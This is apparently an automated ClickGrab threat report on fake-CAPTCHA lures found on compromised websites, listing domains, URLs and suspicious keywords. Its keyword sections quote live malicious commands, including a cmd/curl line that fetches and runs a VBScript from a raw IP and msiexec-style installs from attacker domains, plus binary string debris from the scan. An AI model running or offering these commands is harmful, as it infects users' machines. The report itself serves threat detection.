ClickGrab Threat Analysis Report - 2026-05-18
Generated on 2026-05-18 02:02:23
Executive Summary
- Total sites analyzed: 100
- Sites with malicious content: 22
- Unique domains encountered: 2,378
- Total URLs extracted: 8,402
- PowerShell download attempts: 2
- Clipboard manipulation instances: 101
Domain Analysis
Most Frequently Encountered Domains
- www.maheshwaree.com: 320 occurrences
- 98.70.13.131: 309 occurrences
- fudgeshop.com.au: 265 occurrences
- picsera.com: 226 occurrences
- 18.176.47.246: 218 occurrences
- adturekorea.co.kr: 214 occurrences
- scillarodriguez.com: 199 occurrences
- www.ccera-icar.org: 178 occurrences
- www.creatorssky.com: 156 occurrences
- devblog.ezeelogin.com: 126 occurrences
- www.dorper.com.au: 125 occurrences
- picsera.sirv.com: 121 occurrences
- 104.199.248.167: 71 occurrences
- sun1118.com: 54 occurrences
- 3.18.128.17: 51 occurrences
URL Pattern Analysis
reCAPTCHA imagery
8 occurrences across 5 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)https://www.google.com/recaptcha/api.js(2 times)https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg(2 times)https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha(1 times)https://www.google.com/recaptcha/api.js?hl=&render=6Lf7uxYsAAAAANagtTWlY2ET8HF8nbfMf4-ePcWm(1 times)
Font resources
66 occurrences across 56 distinct URLs
https://fonts.gstatic.com(4 times)https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0(2 times)https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620(2 times)https://use.fontawesome.com/releases/v5.6.3/css/all.css(2 times)https://adturekorea.co.kr/theme/FT_WEB20/css/icofont.min.css(2 times)- ...and 51 more distinct URLs
CDN hosted scripts
5 occurrences across 5 distinct URLs
https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js(1 times)https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/(1 times)https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)https://global.ketchcdn.com/web/v3/config/picsera/website_smart_tag/boot.js(1 times)https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=1.8.1(1 times)
Google resources
93 occurrences across 61 distinct URLs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(13 times)https://www.googletagmanager.com/gtm.js?id=(4 times)https://www.google(3 times)https://fonts.googleapis.com(2 times)https://sites.google.com/view/ikimisilim/ana-sayfa(2 times)- ...and 56 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 515 (107 unique)
Keyword Categories
Social Engineering
42 unique keywords
exec /i https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/";captcha-boxcaptcha-badgecaptcha_wordcaptchaCAPTCHAcaptcha_questionCaptchaLoadingVerification HashCaptchaCheckbox- ...and 32 more
Obfuscation Indicators
11 unique keywords
eval(this._loadScript(url.url) + "\n//@ sourceURL= " + url.url)eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")eval('var timeOut'+popupItems[i].id)eval(frameContents)eval(eval("clearTimeout(timeOut"+uid+")")Command for the linkW! Set the Show Command for the linkW Tell the link to resolve itselfWWW! Get the IconLocation for the linkW! Set the IconLocation for the linkW! Tell the link to save the changesW ISetupStringTable InterfaceWWW Get string from nameWW get_SuiteCallbackW put_SuiteCallbackW get_SuiteExtension put_SuiteExtensionI Command line argument passed to setup.exe when it's launched after rebootW* Set a shortcut property for an opened link7 Retrieve any failures from applying shortcut propertiesWWW0 Set a shortcut property for Run As AdministratorWW3 Retrieve shortcut property for Run As AdministratorWWW. Interface ISetupDynamicLinkedLibraryController InstallShield LogServices ClassWWW ISetupLogService Interface8 Opens the Log Database from the specified Storage objectWW: Creates a new Log Database on the specified Storage object* Opens the Log Database in a read-only mode ISetupLogService2 InterfaceWWW SetupMainWindow ClassW ISetupMainWindow Interface Window caption Window handleW Shows/Hides wait cursorWWW Create windowW Destroy window ISetupWindowText Interface property Color property TextWexec() QApplication::%s: Please instantiate the QApplication object first %L1 WARNING: QApplication was not created in the main() thread. �sgqAppName QCoreApplication: Application event filter cannot be in a different thread. QCoreApplication: Object event filter cannot be in a different thread. QCoreApplication::applicationFilePath: Please instantiate the QApplication object first QCoreApplication::argc: Please instantiate the QApplication object first QCoreApplication::argv: Please instantiate the QApplication object first QCoreApplication::enter_loop: Must be called from the main thread enter_loop loopLevel QCoreApplication::notify: Unexpected null receiver installTranslator QCoreApplication::applicationDirPath: Please instantiate the QApplication object first removeTranslator QCoreApplication::postEvent: Unexpected null receiver QCoreApplication::sendPostedEvents: Cannot send posted events for objects in another thread QCoreApplication::exit_loop: Must be called from the main thread exit_loop <�g��g��g��gP-g�g� g��g��g��g��g��g g� g�� g-testability -graphicssystem -session -style -style= -widgetcount -stylesheet -reverse -qdebug -qdevel QCoreApplication::arguments: Please instantiate the QApplication object first QT_PLUGIN_PATH QCoreApplication::exec: The event loop is already running %s::exec: Must be called from the main thread exec ��g�3g��g�3g �g4gl�g�4g:: const enum class struct char short ulong long uint int unsigned const onst Qt void QMetaMethod::invoke: Dead lock detected in BlockingQueuedConnection: Receiver is %s(%p)eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")eval("clearTimeout(timeIn"+uid+")")- ...and 1 more
System Commands
33 unique keywords
exec /i http://inkbookwriters.com/verify /qn';wscriptCMDPOWerShEllcmd /c "curl -s http://178.17.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nul && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';command %d QPicture::metric: Invalid metric command ffffff9@QPicture::play: Format error /pictureformats QPictureIO::write: No such picture format handler: %s QPicture: invalid format version 0 0�be@�e�� e��e��e �Fe�ep�eQPicture::load: No such picture format: %s QPicture::save: No such picture format: %s QPicture::save: still being painted on. Call QPainter::end() first ��be��e��Oe��=e��=e��Oe|�beЍNe �Ne��Ne@�e�{Oed{Oej{Oep{Oev{Oe|{Oe�{Oe �be�e@le�lePze�ze�e�xe�oe�me�re�se� e�pene�e@oee@ne ne�oe�oe��eQPixmap: Must construct a QApplication before a QPaintDevice L�be��ep�2e0�e��e �Fe�eQPixmap::operator=: Cannot assign to pixmap during painting QPixmap::save: quality out of range [-1,100] QPixmap::setMask() mask size differs from pixmap size QPixmap::setMask: Cannot set mask while pixmap is being painted on QPixmap::fill: Cannot fill while pixmap is being painted on QPixmap::setAlphaChannel: The pixmap and the alpha channel pixmap must have the same size QPixmap::setAlphaChannel: Cannot set alpha channel while pixmap is being painted on QPixmap::scaled: Pixmap is a null pixmap QPixmap::scaleWidth: Pixmap is a null pixmap QPixmap::scaleHeight: Pixmap is a null pixmap qt_pixmap QPMCache QCache